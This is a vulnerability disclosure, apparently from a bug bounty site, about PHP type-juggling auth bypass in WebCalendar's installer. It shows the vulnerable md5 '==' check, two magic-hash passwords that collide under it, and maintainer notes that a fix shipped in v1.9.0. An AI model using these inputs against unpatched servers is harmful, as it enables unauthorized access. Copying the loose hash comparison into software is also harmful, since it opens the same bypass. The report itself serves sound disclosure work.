Type Confusion in craigk5n/webcalendar
Reported on
Oct 1st 2021
Description
During the comparisons of different variables, php will automatically convert the data into a common, comparable type. This leads to a variety of problems and might even cause security vulnerabilities.
https://github.com/craigk5n/webcalendar has type juggling vulnerabilities that allows auth bypass as shown below:
Proof of Concept
webcalendar uses md5 to store user provided passwords and stored in a configuration file as follows:
fwrite( $fd, '<?php' . "\r\n" . 'install_password: ' . md5( $pwd1 )
. "\r\n?>\r\n" );
fclose( $fd );
later, it uses this conf file to perform auth checks, under certain circunstaces this checks can be bypassed because type juggling and magic hashes.
Payload: Go to http://localhost/webcalendar-master/install/index.php Enter password:
UEaXPm4IIDp3
This generates the settings file /var/www/html/webcalendar-master/includes/settings.php with the following content:
<?php
install_password: 0e461721121374870411609769578212
?>
The following block checks for the password, however uses == to verify it.
Thus making it vulnerable to Auth bypass using type conversion magic hashes:
if( md5( $pwd ) == $password ) {
$_SESSION['validuser'] = $password;
echo translate( 'Password Accepted' ) . '</title>
<meta http-equiv="refresh" content="0; index.php" />
</head>
Now go to: http://localhost/webcalendar-master/install/index.php And enter a different password , for example:
wzXzQTGIx9VU
And observe the login is correct
Impact
This vulnerability is capable of bypassing authentication
Occurrences
SECURITY.md
2 years ago
There is an open pull request that addresses this issue: https://github.com/craigk5n/webcalendar/pull/250/files It should be merged into master in the next week.
This has been merged into master and boostrap-ui branches.
The fix for this was included in the WebCalendar v1.9.0 release.